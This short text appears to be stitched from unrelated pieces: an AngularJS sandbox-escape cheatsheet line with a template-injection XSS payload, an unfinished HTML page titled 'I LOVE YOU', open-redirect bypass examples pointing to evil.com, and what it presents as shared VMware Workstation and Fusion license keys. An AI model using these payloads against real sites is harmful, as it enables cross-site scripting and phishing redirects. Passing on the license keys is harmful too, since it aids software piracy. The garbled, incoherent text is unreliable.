# Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
<!DOCTYPE html>
<html>
<head>
<title>I LOVE YOU</title>
<script>
onload = function () {
var d = document;
// Fade in
function feedin (feed, speed) {
var filter = 0;
Simply try to change the domain
Example: ?redirect=https://example.com --> ?redirect=https://evil.com
Bypass the filter when protocol is blacklisted using //
Example: ?redirect=https://example.com --> ?redirect=//evil.com
Obviously using these keys may be a grey area. I use them for my computer, but there are no guarantees VMware won't sue you if you use them in a commercial environment.
VMware Workstation 16
YF390-0HF8P-M81RQ-2DXQE-M2UT6 | |
VMware Fusion Pro 12
YF390-0HF8P-M81RQ-2DXQE-M2UT6 | |
As far as I know, this key works on both Fusion and Workstation. |